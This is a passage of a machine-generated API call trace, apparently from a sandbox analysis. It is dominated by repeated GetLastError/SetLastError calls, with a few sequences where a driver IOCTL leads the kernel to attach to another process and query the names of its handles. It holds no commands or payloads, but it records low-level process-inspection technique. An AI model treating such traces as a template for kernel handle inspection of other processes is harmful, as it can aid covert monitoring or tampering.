(dwErrCode=0x57) [0159.925] GetLastError () returned 0x57 [0159.925] SetLastError (dwErrCode=0x57) [0159.925] GetLastError () returned 0x57 [0159.925] SetLastError (dwErrCode=0x57) [0159.925] GetLastError () returned 0x57 [0159.925] SetLastError (dwErrCode=0x57) [0159.925] GetLastError () returned 0x57 [0159.926] SetLastError (dwErrCode=0x57) [0159.926] GetLastError () returned 0x57 [0159.926] SetLastError (dwErrCode=0x57) [0159.926] GetLastError () returned 0x57 [0159.926] SetLastError (dwErrCode=0x57) [0159.926] GetLastError () returned 0x57 [0159.926] SetLastError (dwErrCode=0x57) [0159.927] GetLastError () returned 0x57 [0159.927] SetLastError (dwErrCode=0x57) [0159.927] GetLastError () returned 0x57 [0159.927] SetLastError (dwErrCode=0x57) [0159.927] GetLastError () returned 0x57 [0159.927] SetLastError (dwErrCode=0x57) [0159.927] GetLastError () returned 0x57 [0159.927] SetLastError (dwErrCode=0x57) [0159.928] GetLastError () returned 0x57 [0159.928] SetLastError (dwErrCode=0x57) [0159.928] GetLastError () returned 0x57 [0159.928] SetLastError (dwErrCode=0x57) [0159.928] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0159.928] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0xa6, lpOverlapped=0x0) returned 1 [0159.928] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0159.929] PsAcquireProcessExitSynchronization () returned 0x0 [0159.929] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0) [0159.929] ObReferenceObjectByHandle (in: Handle=0x150, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00150f740, HandleInformation=0x0) returned 0x0 [0159.929] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0159.929] PsReleaseProcessExitSynchronization () returned 0x2 [0159.929] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0159.930] ObQueryNameString (in: Object=0xfffff8a00150f740, ObjectNameInfo=0xfffffa8003206044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003206044, ReturnLength=0xfffff88005163550) returned 0x0 [0159.930] ObfDereferenceObject (Object=0xfffff8a00150f740) returned 0x2 [0159.930] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0159.930] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0159.930] GetLastError () returned 0x57 [0159.930] SetLastError (dwErrCode=0x57) [0159.930] GetLastError () returned 0x57 [0159.931] SetLastError (dwErrCode=0x57) [0159.931] GetLastError () returned 0x57 [0159.931] SetLastError (dwErrCode=0x57) [0159.931] GetLastError () returned 0x57 [0159.931] SetLastError (dwErrCode=0x57) [0159.931] GetLastError () returned 0x57 [0159.932] SetLastError (dwErrCode=0x57) [0159.932] GetLastError () returned 0x57 [0159.932] SetLastError (dwErrCode=0x57) [0159.932] GetLastError () returned 0x57 [0159.932] SetLastError (dwErrCode=0x57) [0159.932] GetLastError () returned 0x57 [0159.932] SetLastError (dwErrCode=0x57) [0159.932] GetLastError () returned 0x57 [0159.933] SetLastError (dwErrCode=0x57) [0159.933] GetLastError () returned 0x57 [0159.933] SetLastError (dwErrCode=0x57) [0159.933] GetLastError () returned 0x57 [0159.933] SetLastError (dwErrCode=0x57) [0159.933] GetLastError () returned 0x57 [0159.933] SetLastError (dwErrCode=0x57) [0159.933] GetLastError () returned 0x57 [0159.934] SetLastError (dwErrCode=0x57) [0159.934] GetLastError () returned 0x57 [0159.934] SetLastError (dwErrCode=0x57) [0159.934] GetLastError () returned 0x57 [0159.934] SetLastError (dwErrCode=0x57) [0159.934] GetLastError () returned 0x57 [0159.935] SetLastError (dwErrCode=0x57) [0159.935] GetLastError () returned 0x57 [0159.935] SetLastError (dwErrCode=0x57) [0159.935] GetLastError () returned 0x57 [0159.935] SetLastError (dwErrCode=0x57) [0159.935] GetLastError () returned 0x57 [0159.936] SetLastError (dwErrCode=0x57) [0159.936] GetLastError () returned 0x57 [0159.936] SetLastError (dwErrCode=0x57) [0159.936] GetLastError () returned 0x57 [0159.936] SetLastError (dwErrCode=0x57) [0159.936] GetLastError () returned 0x57 [0159.937] SetLastError (dwErrCode=0x57) [0159.937] GetLastError () returned 0x57 [0159.937] SetLastError (dwErrCode=0x57) [0159.937] GetLastError () returned 0x57 [0159.937] SetLastError (dwErrCode=0x57) [0159.937] GetLastError () returned 0x57 [0159.937] SetLastError (dwErrCode=0x57) [0159.937] GetLastError () returned 0x57 [0159.938] SetLastError (dwErrCode=0x57) [0159.938] GetLastError () returned 0x57 [0159.938] SetLastError (dwErrCode=0x57) [0159.938] GetLastError () returned 0x57 [0159.938] SetLastError (dwErrCode=0x57) [0159.938] GetLastError () returned 0x57 [0159.938] SetLastError (dwErrCode=0x57) [0159.939] GetLastError () returned 0x57 [0159.939] SetLastError (dwErrCode=0x57) [0159.939] GetLastError () returned 0x57 [0159.939] SetLastError (dwErrCode=0x57) [0159.939] GetLastError () returned 0x57 [0159.939] SetLastError (dwErrCode=0x57) [0159.939] GetLastError () returned 0x57 [0159.939] SetLastError (dwErrCode=0x57) [0159.939] GetLastError () returned 0x57 [0159.940] SetLastError (dwErrCode=0x57) [0159.940] GetLastError () returned 0x57 [0159.940] SetLastError (dwErrCode=0x57) [0159.940] GetLastError () returned 0x57 [0159.940] SetLastError (dwErrCode=0x57) [0159.940] GetLastError () returned 0x57 [0159.940] SetLastError (dwErrCode=0x57) [0159.940] GetLastError () returned 0x57 [0159.941] SetLastError (dwErrCode=0x57) [0159.941] GetLastError () returned 0x57 [0159.941] SetLastError (dwErrCode=0x57) [0159.941] GetLastError () returned 0x57 [0159.941] SetLastError (dwErrCode=0x57) [0159.941] GetLastError () returned 0x57 [0159.941] SetLastError (dwErrCode=0x57) [0159.941] GetLastError () returned 0x57 [0159.942] SetLastError (dwErrCode=0x57) [0159.942] GetLastError () returned 0x57 [0159.942] SetLastError (dwErrCode=0x57) [0159.942] GetLastError () returned 0x57 [0159.942] SetLastError (dwErrCode=0x57) [0159.942] GetLastError () returned 0x57 [0159.942] SetLastError (dwErrCode=0x57) [0159.942] GetLastError () returned 0x57 [0159.942] SetLastError (dwErrCode=0x57) [0159.943] GetLastError () returned 0x57 [0159.943] SetLastError (dwErrCode=0x57) [0159.943] GetLastError () returned 0x57 [0159.943] SetLastError (dwErrCode=0x57) [0159.943] GetLastError () returned 0x57 [0159.943] SetLastError (dwErrCode=0x57) [0159.943] GetLastError () returned 0x57 [0159.943] SetLastError (dwErrCode=0x57) [0159.943] GetLastError () returned 0x57 [0159.944] SetLastError (dwErrCode=0x57) [0159.944] GetLastError () returned 0x57 [0159.944] SetLastError (dwErrCode=0x57) [0159.944] GetLastError () returned 0x57 [0159.944] SetLastError (dwErrCode=0x57) [0159.944] GetLastError () returned 0x57 [0159.944] SetLastError (dwErrCode=0x57) [0159.945] GetLastError () returned 0x57 [0159.945] SetLastError (dwErrCode=0x57) [0159.945] GetLastError () returned 0x57 [0159.945] SetLastError (dwErrCode=0x57) [0159.945] GetLastError () returned 0x57 [0159.945] SetLastError (dwErrCode=0x57) [0159.946] GetLastError () returned 0x57 [0159.946] SetLastError (dwErrCode=0x57) [0159.946] GetLastError () returned 0x57 [0159.946] SetLastError (dwErrCode=0x57) [0159.946] GetLastError () returned 0x57 [0159.946] SetLastError (dwErrCode=0x57) [0159.946] GetLastError () returned 0x57 [0159.946] SetLastError (dwErrCode=0x57) [0159.947] GetLastError () returned 0x57 [0159.947] SetLastError (dwErrCode=0x57) [0159.947] GetLastError () returned 0x57 [0159.947] SetLastError (dwErrCode=0x57) [0159.947] GetLastError () returned 0x57 [0159.947] SetLastError (dwErrCode=0x57) [0159.947] GetLastError () returned 0x57 [0159.948] SetLastError (dwErrCode=0x57) [0159.948] GetLastError () returned 0x57 [0159.948] SetLastError (dwErrCode=0x57) [0159.948] GetLastError () returned 0x57 [0159.948] SetLastError (dwErrCode=0x57) [0159.948] GetLastError () returned 0x57 [0159.948] SetLastError (dwErrCode=0x57) [0159.948] GetLastError () returned 0x57 [0159.949] SetLastError (dwErrCode=0x57) [0159.949] GetLastError () returned 0x57 [0159.949] SetLastError (dwErrCode=0x57) [0159.949] GetLastError () returned 0x57 [0159.949] SetLastError (dwErrCode=0x57) [0159.949] GetLastError () returned 0x57 [0159.949] SetLastError (dwErrCode=0x57) [0159.949] GetLastError () returned 0x57 [0159.950] SetLastError (dwErrCode=0x57) [0159.950] GetLastError () returned 0x57 [0159.950] SetLastError (dwErrCode=0x57) [0159.950] GetLastError () returned 0x57 [0159.950] SetLastError (dwErrCode=0x57) [0159.950] GetLastError () returned 0x57 [0159.950] SetLastError (dwErrCode=0x57) [0159.950] GetLastError () returned 0x57 [0159.951] SetLastError (dwErrCode=0x57) [0159.951] GetLastError () returned 0x57 [0159.951] SetLastError (dwErrCode=0x57) [0159.951] GetLastError () returned 0x57 [0159.951] SetLastError (dwErrCode=0x57) [0159.951] GetLastError () returned 0x57 [0159.951] SetLastError (dwErrCode=0x57) [0159.951] GetLastError () returned 0x57 [0159.952] SetLastError (dwErrCode=0x57) [0159.952] GetLastError () returned 0x57 [0159.952] SetLastError (dwErrCode=0x57) [0159.952] GetLastError () returned 0x57 [0159.952] SetLastError (dwErrCode=0x57) [0159.953] GetLastError () returned 0x57 [0159.953] SetLastError (dwErrCode=0x57) [0159.953] GetLastError () returned 0x57 [0159.953] SetLastError (dwErrCode=0x57) [0159.953] GetLastError () returned 0x57 [0159.953] SetLastError (dwErrCode=0x57) [0159.953] GetLastError () returned 0x57 [0159.954] SetLastError (dwErrCode=0x57) [0159.954] GetLastError () returned 0x57 [0159.954] SetLastError (dwErrCode=0x57) [0159.954] GetLastError () returned 0x57 [0159.954] SetLastError (dwErrCode=0x57) [0159.954] GetLastError () returned 0x57 [0159.954] SetLastError (dwErrCode=0x57) [0159.955] GetLastError () returned 0x57 [0159.955] SetLastError (dwErrCode=0x57) [0159.955] GetLastError () returned 0x57 [0159.955] SetLastError (dwErrCode=0x57) [0159.955] GetLastError () returned 0x57 [0159.955] SetLastError (dwErrCode=0x57) [0159.955] GetLastError () returned 0x57 [0159.956] SetLastError (dwErrCode=0x57) [0159.956] GetLastError () returned 0x57 [0159.956] SetLastError (dwErrCode=0x57) [0159.956] GetLastError () returned 0x57 [0159.956] SetLastError (dwErrCode=0x57) [0159.956] GetLastError () returned 0x57 [0159.956] SetLastError (dwErrCode=0x57) [0159.957] GetLastError () returned 0x57 [0159.957] SetLastError (dwErrCode=0x57) [0159.957] GetLastError () returned 0x57 [0159.957] SetLastError (dwErrCode=0x57) [0159.957] GetLastError () returned 0x57 [0159.957] SetLastError (dwErrCode=0x57) [0159.957] GetLastError () returned 0x57 [0159.957] SetLastError (dwErrCode=0x57) [0159.958] GetLastError () returned 0x57 [0159.958] SetLastError (dwErrCode=0x57) [0159.958] GetLastError () returned 0x57 [0159.958] SetLastError (dwErrCode=0x57) [0159.958] GetLastError () returned 0x57 [0159.958] SetLastError (dwErrCode=0x57) [0159.958] GetLastError () returned 0x57 [0159.958] SetLastError (dwErrCode=0x57) [0159.959] GetLastError () returned 0x57 [0159.959] SetLastError (dwErrCode=0x57) [0159.959] GetLastError () returned 0x57 [0159.959] SetLastError (dwErrCode=0x57) [0159.959] GetLastError () returned 0x57 [0159.959] SetLastError (dwErrCode=0x57) [0159.959] GetLastError () returned 0x57 [0159.960] SetLastError (dwErrCode=0x57) [0159.960] GetLastError () returned 0x57 [0159.960] SetLastError (dwErrCode=0x57) [0159.960] GetLastError () returned 0x57 [0161.197] SetLastError (dwErrCode=0x57) [0161.197] GetLastError () returned 0x57 [0161.197] SetLastError (dwErrCode=0x57) [0161.197] GetLastError () returned 0x57 [0161.197] SetLastError (dwErrCode=0x57) [0161.197] GetLastError () returned 0x57 [0161.197] SetLastError (dwErrCode=0x57) [0161.199] GetLastError () returned 0x57 [0161.199] SetLastError (dwErrCode=0x57) [0161.199] GetLastError () returned 0x57 [0161.199] SetLastError (dwErrCode=0x57) [0161.200] GetLastError () returned 0x57 [0161.200] SetLastError (dwErrCode=0x57) [0161.200] GetLastError () returned 0x57 [0161.200] SetLastError (dwErrCode=0x57) [0161.200] GetLastError () returned 0x57 [0161.200] SetLastError (dwErrCode=0x57) [0161.200] GetLastError () returned 0x57 [0161.200] SetLastError (dwErrCode=0x57) [0161.200] GetLastError () returned 0x57 [0161.201] SetLastError (dwErrCode=0x57) [0161.201] GetLastError () returned 0x57 [0161.201] SetLastError (dwErrCode=0x57) [0161.201] GetLastError () returned 0x57 [0161.201] SetLastError (dwErrCode=0x57) [0161.201] GetLastError () returned 0x57 [0161.201] SetLastError (dwErrCode=0x57) [0161.201] GetLastError () returned 0x57 [0161.201] SetLastError (dwErrCode=0x57) [0161.202] GetLastError () returned 0x57 [0161.202] SetLastError (dwErrCode=0x57) [0161.202] GetLastError () returned 0x57 [0161.202] SetLastError (dwErrCode=0x57) [0161.202] GetLastError () returned 0x57 [0161.202] SetLastError (dwErrCode=0x57) [0161.202] GetLastError () returned 0x57 [0161.202] SetLastError (dwErrCode=0x57) [0161.203] GetLastError () returned 0x57 [0161.203] SetLastError (dwErrCode=0x57) [0161.203] GetLastError () returned 0x57 [0161.203] SetLastError (dwErrCode=0x57) [0161.203] GetLastError () returned 0x57 [0161.203] SetLastError (dwErrCode=0x57) [0161.203] GetLastError () returned 0x57 [0161.203] SetLastError (dwErrCode=0x57) [0161.203] GetLastError () returned 0x57 [0161.204] SetLastError (dwErrCode=0x57) [0161.204] GetLastError () returned 0x57 [0161.204] SetLastError (dwErrCode=0x57) [0161.204] GetLastError () returned 0x57 [0161.204] SetLastError (dwErrCode=0x57) [0161.204] GetLastError () returned 0x57 [0161.204] SetLastError (dwErrCode=0x57) [0161.204] GetLastError () returned 0x57 [0161.205] SetLastError (dwErrCode=0x57) [0161.205] GetLastError () returned 0x57 [0161.205] SetLastError (dwErrCode=0x57) [0161.205] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.205] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0xa6, lpOverlapped=0x0) returned 1 [0161.206] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.206] PsAcquireProcessExitSynchronization () returned 0x0 [0161.206] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0) [0161.206] ObReferenceObjectByHandle (in: Handle=0x158, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001b55980, HandleInformation=0x0) returned 0x0 [0161.206] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.206] PsReleaseProcessExitSynchronization () returned 0x2 [0161.206] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0161.206] ObQueryNameString (in: Object=0xfffff8a001b55980, ObjectNameInfo=0xfffffa8003206044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003206044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.206] ObfDereferenceObject (Object=0xfffff8a001b55980) returned 0x2 [0161.207] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.207] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.207] GetLastError () returned 0x57 [0161.207] SetLastError (dwErrCode=0x57) [0161.207] GetLastError () returned 0x57 [0161.207] SetLastError (dwErrCode=0x57) [0161.208] GetLastError () returned 0x57 [0161.208] SetLastError (dwErrCode=0x57) [0161.208] GetLastError () returned 0x57 [0161.208] SetLastError (dwErrCode=0x57) [0161.208] GetLastError () returned 0x57 [0161.208] SetLastError (dwErrCode=0x57) [0161.208] GetLastError () returned 0x57 [0161.209] SetLastError (dwErrCode=0x57) [0161.209] GetLastError () returned 0x57 [0161.209] SetLastError (dwErrCode=0x57) [0161.209] GetLastError () returned 0x57 [0161.209] SetLastError (dwErrCode=0x57) [0161.209] GetLastError () returned 0x57 [0161.209] SetLastError (dwErrCode=0x57) [0161.209] GetLastError () returned 0x57 [0161.210] SetLastError (dwErrCode=0x57) [0161.210] GetLastError () returned 0x57 [0161.210] SetLastError (dwErrCode=0x57) [0161.210] GetLastError () returned 0x57 [0161.210] SetLastError (dwErrCode=0x57) [0161.210] GetLastError () returned 0x57 [0161.210] SetLastError (dwErrCode=0x57) [0161.210] GetLastError () returned 0x57 [0161.211] SetLastError (dwErrCode=0x57) [0161.211] GetLastError () returned 0x57 [0161.211] SetLastError (dwErrCode=0x57) [0161.211] GetLastError () returned 0x57 [0161.211] SetLastError (dwErrCode=0x57) [0161.211] GetLastError () returned 0x57 [0161.211] SetLastError (dwErrCode=0x57) [0161.212] GetLastError () returned 0x57 [0161.212] SetLastError (dwErrCode=0x57) [0161.212] GetLastError () returned 0x57 [0161.212] SetLastError (dwErrCode=0x57) [0161.212] GetLastError () returned 0x57 [0161.212] SetLastError (dwErrCode=0x57) [0161.212] GetLastError () returned 0x57 [0161.212] SetLastError (dwErrCode=0x57) [0161.212] GetLastError () returned 0x57 [0161.213] SetLastError (dwErrCode=0x57) [0161.213] GetLastError () returned 0x57 [0161.213] SetLastError (dwErrCode=0x57) [0161.213] GetLastError () returned 0x57 [0161.213] SetLastError (dwErrCode=0x57) [0161.213] GetLastError () returned 0x57 [0161.213] SetLastError (dwErrCode=0x57) [0161.213] GetLastError () returned 0x57 [0161.214] SetLastError (dwErrCode=0x57) [0161.214] GetLastError () returned 0x57 [0161.214] SetLastError (dwErrCode=0x57) [0161.214] GetLastError () returned 0x57 [0161.214] SetLastError (dwErrCode=0x57) [0161.214] GetLastError () returned 0x57 [0161.214] SetLastError (dwErrCode=0x57) [0161.215] GetLastError () returned 0x57 [0161.215] SetLastError (dwErrCode=0x57) [0161.215] GetLastError () returned 0x57 [0161.215] SetLastError (dwErrCode=0x57) [0161.215] GetLastError () returned 0x57 [0161.215] SetLastError (dwErrCode=0x57) [0161.215] GetLastError () returned 0x57 [0161.216] SetLastError (dwErrCode=0x57) [0161.216] GetLastError () returned 0x57 [0161.216] SetLastError (dwErrCode=0x57) [0161.216] GetLastError () returned 0x57 [0161.216] SetLastError (dwErrCode=0x57) [0161.216] GetLastError () returned 0x57 [0161.216] SetLastError (dwErrCode=0x57) [0161.216] GetLastError () returned 0x57 [0161.217] SetLastError (dwErrCode=0x57) [0161.217] GetLastError () returned 0x57 [0161.217] SetLastError (dwErrCode=0x57) [0161.217] GetLastError () returned 0x57 [0161.217] SetLastError (dwErrCode=0x57) [0161.217] GetLastError () returned 0x57 [0161.217] SetLastError (dwErrCode=0x57) [0161.218] GetLastError () returned 0x57 [0161.218] SetLastError (dwErrCode=0x57) [0161.218] GetLastError () returned 0x57 [0161.218] SetLastError (dwErrCode=0x57) [0161.218] GetLastError () returned 0x57 [0161.218] SetLastError (dwErrCode=0x57) [0161.218] GetLastError () returned 0x57 [0161.219] SetLastError (dwErrCode=0x57) [0161.219] GetLastError () returned 0x57 [0161.219] SetLastError (dwErrCode=0x57) [0161.219] GetLastError () returned 0x57 [0161.219] SetLastError (dwErrCode=0x57) [0161.219] GetLastError () returned 0x57 [0161.219] SetLastError (dwErrCode=0x57) [0161.220] GetLastError () returned 0x57 [0161.220] SetLastError (dwErrCode=0x57) [0161.220] GetLastError () returned 0x57 [0161.220] SetLastError (dwErrCode=0x57) [0161.220] GetLastError () returned 0x57 [0161.220] SetLastError (dwErrCode=0x57) [0161.220] GetLastError () returned 0x57 [0161.221] SetLastError (dwErrCode=0x57) [0161.221] GetLastError () returned 0x57 [0161.221] SetLastError (dwErrCode=0x57) [0161.221] GetLastError () returned 0x57 [0161.221] SetLastError (dwErrCode=0x57) [0161.221] GetLastError () returned 0x57 [0161.221] SetLastError (dwErrCode=0x57) [0161.221] GetLastError () returned 0x57 [0161.222] SetLastError (dwErrCode=0x57) [0161.222] GetLastError () returned 0x57 [0161.222] SetLastError (dwErrCode=0x57) [0161.222] GetLastError () returned 0x57 [0161.222] SetLastError (dwErrCode=0x57) [0161.222] GetLastError () returned 0x57 [0161.222] SetLastError (dwErrCode=0x57) [0161.223] GetLastError () returned 0x57 [0161.223] SetLastError (dwErrCode=0x57) [0161.223] GetLastError () returned 0x57 [0161.223] SetLastError (dwErrCode=0x57) [0161.223] GetLastError () returned 0x57 [0161.223] SetLastError (dwErrCode=0x57) [0161.223] GetLastError () returned 0x57 [0161.224] SetLastError (dwErrCode=0x57) [0161.225] GetLastError () returned 0x57 [0161.225] SetLastError (dwErrCode=0x57) [0161.225] GetLastError () returned 0x57 [0161.225] SetLastError (dwErrCode=0x57) [0161.225] GetLastError () returned 0x57 [0161.225] SetLastError (dwErrCode=0x57) [0161.225] GetLastError () returned 0x57 [0161.225] SetLastError (dwErrCode=0x57) [0161.226] GetLastError () returned 0x57 [0161.226] SetLastError (dwErrCode=0x57) [0161.226] GetLastError () returned 0x57 [0161.226] SetLastError (dwErrCode=0x57) [0161.226] GetLastError () returned 0x57 [0161.226] SetLastError (dwErrCode=0x57) [0161.226] GetLastError () returned 0x57 [0161.226] SetLastError (dwErrCode=0x57) [0161.227] GetLastError () returned 0x57 [0161.227] SetLastError (dwErrCode=0x57) [0161.227] GetLastError () returned 0x57 [0161.227] SetLastError (dwErrCode=0x57) [0161.227] GetLastError () returned 0x57 [0161.227] SetLastError (dwErrCode=0x57) [0161.227] GetLastError () returned 0x57 [0161.227] SetLastError (dwErrCode=0x57) [0161.227] GetLastError () returned 0x57 [0161.228] SetLastError (dwErrCode=0x57) [0161.228] GetLastError () returned 0x57 [0161.228] SetLastError (dwErrCode=0x57) [0161.228] GetLastError () returned 0x57 [0161.228] SetLastError (dwErrCode=0x57) [0161.228] GetLastError () returned 0x57 [0161.228] SetLastError (dwErrCode=0x57) [0161.228] GetLastError () returned 0x57 [0161.228] SetLastError (dwErrCode=0x57) [0161.229] GetLastError () returned 0x57 [0161.229] SetLastError (dwErrCode=0x57) [0161.229] GetLastError () returned 0x57 [0161.229] SetLastError (dwErrCode=0x57) [0161.229] GetLastError () returned 0x57 [0161.229] SetLastError (dwErrCode=0x57) [0161.229] GetLastError () returned 0x57 [0161.229] SetLastError (dwErrCode=0x57) [0161.229] GetLastError () returned 0x57 [0161.230] SetLastError (dwErrCode=0x57) [0161.230] GetLastError () returned 0x57 [0161.230] SetLastError (dwErrCode=0x57) [0161.230] GetLastError () returned 0x57 [0161.230] SetLastError (dwErrCode=0x57) [0161.230] GetLastError () returned 0x57 [0161.230] SetLastError (dwErrCode=0x57) [0161.230] GetLastError () returned 0x57 [0161.230] SetLastError (dwErrCode=0x57) [0161.230] GetLastError () returned 0x57 [0161.231] SetLastError (dwErrCode=0x57) [0161.231] GetLastError () returned 0x57 [0161.231] SetLastError (dwErrCode=0x57) [0161.231] GetLastError () returned 0x57 [0161.231] SetLastError (dwErrCode=0x57) [0161.231] GetLastError () returned 0x57 [0161.231] SetLastError (dwErrCode=0x57) [0161.231] GetLastError () returned 0x57 [0161.231] SetLastError (dwErrCode=0x57) [0161.232] GetLastError () returned 0x57 [0161.232] SetLastError (dwErrCode=0x57) [0161.312] GetLastError () returned 0x57 [0161.312] SetLastError (dwErrCode=0x57) [0161.312] GetLastError () returned 0x57 [0161.313] SetLastError (dwErrCode=0x57) [0161.313] GetLastError () returned 0x57 [0161.313] SetLastError (dwErrCode=0x57) [0161.313] GetLastError () returned 0x57 [0161.313] SetLastError (dwErrCode=0x57) [0161.313] GetLastError () returned 0x57 [0161.313] SetLastError (dwErrCode=0x57) [0161.313] GetLastError () returned 0x57 [0161.313] SetLastError (dwErrCode=0x57) [0161.313] GetLastError () returned 0x57 [0161.313] SetLastError (dwErrCode=0x57) [0161.313] GetLastError () returned 0x57 [0161.314] SetLastError (dwErrCode=0x57) [0161.314] GetLastError () returned 0x57 [0161.314] SetLastError (dwErrCode=0x57) [0161.314] GetLastError () returned 0x57 [0161.314] SetLastError (dwErrCode=0x57) [0161.314] GetLastError () returned 0x57 [0161.314] SetLastError (dwErrCode=0x57) [0161.314] GetLastError () returned 0x57 [0161.314] SetLastError (dwErrCode=0x57) [0161.314] GetLastError () returned 0x57 [0161.314] SetLastError (dwErrCode=0x57) [0161.314] GetLastError () returned 0x57 [0161.315] SetLastError (dwErrCode=0x57) [0161.315] GetLastError () returned 0x57 [0161.315] SetLastError (dwErrCode=0x57) [0161.315] GetLastError () returned 0x57 [0161.315] SetLastError (dwErrCode=0x57) [0161.315] GetLastError () returned 0x57 [0161.315] SetLastError (dwErrCode=0x57) [0161.315] GetLastError () returned 0x57 [0161.315] SetLastError (dwErrCode=0x57) [0161.315] GetLastError () returned 0x57 [0161.315] SetLastError (dwErrCode=0x57) [0161.316] GetLastError () returned 0x57 [0161.316] SetLastError (dwErrCode=0x57) [0161.316] GetLastError () returned 0x57 [0161.316] SetLastError (dwErrCode=0x57) [0161.316] GetLastError () returned 0x57 [0161.316] SetLastError (dwErrCode=0x57) [0161.316] GetLastError () returned 0x57 [0161.316] SetLastError (dwErrCode=0x57) [0161.316] GetLastError () returned 0x57 [0161.316] SetLastError (dwErrCode=0x57) [0161.316] GetLastError () returned 0x57 [0161.316] SetLastError (dwErrCode=0x57) [0161.316] GetLastError () returned 0x57 [0161.317] SetLastError (dwErrCode=0x57) [0161.317] GetLastError () returned 0x57 [0161.317] SetLastError (dwErrCode=0x57) [0161.317] GetLastError () returned 0x57 [0161.317] SetLastError (dwErrCode=0x57) [0161.317] GetLastError () returned 0x57 [0161.317] SetLastError (dwErrCode=0x57) [0161.317] GetLastError () returned 0x57 [0161.317] SetLastError (dwErrCode=0x57) [0161.318] GetLastError () returned 0x57 [0161.318] SetLastError (dwErrCode=0x57) [0161.318] GetLastError () returned 0x57 [0161.318] SetLastError (dwErrCode=0x57) [0161.318] GetLastError () returned 0x57 [0161.318] SetLastError (dwErrCode=0x57) [0161.318] GetLastError () returned 0x57 [0161.319] SetLastError (dwErrCode=0x57) [0161.319] GetLastError () returned 0x57 [0161.319] SetLastError (dwErrCode=0x57) [0161.319] GetLastError () returned 0x57 [0161.319] SetLastError (dwErrCode=0x57) [0161.319] GetLastError () returned 0x57 [0161.319] SetLastError (dwErrCode=0x57) [0161.319] GetLastError () returned 0x57 [0161.320] SetLastError (dwErrCode=0x57) [0161.320] GetLastError () returned 0x57 [0161.320] SetLastError (dwErrCode=0x57) [0161.320] GetLastError () returned 0x57 [0161.320] SetLastError (dwErrCode=0x57) [0161.320] GetLastError () returned 0x57 [0161.320] SetLastError (dwErrCode=0x57) [0161.320] GetLastError () returned 0x57 [0161.320] SetLastError (dwErrCode=0x57) [0161.320] GetLastError () returned 0x57 [0161.320] SetLastError (dwErrCode=0x57) [0161.320] GetLastError () returned 0x57 [0161.321] SetLastError (dwErrCode=0x57) [0161.321] GetLastError () returned 0x57 [0161.321] SetLastError (dwErrCode=0x57) [0161.321] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.321] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x102, lpOverlapped=0x0) returned 1 [0161.321] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.321] PsAcquireProcessExitSynchronization () returned 0x0 [0161.321] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0) [0161.321] ObReferenceObjectByHandle (in: Handle=0x160, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80019e9070, HandleInformation=0x0) returned 0x0 [0161.321] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.321] PsReleaseProcessExitSynchronization () returned 0x2 [0161.321] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0161.321] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fa8044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fa8044, ReturnLength=0xfffff88005163508) returned 0x0 [0161.321] ObfDereferenceObject 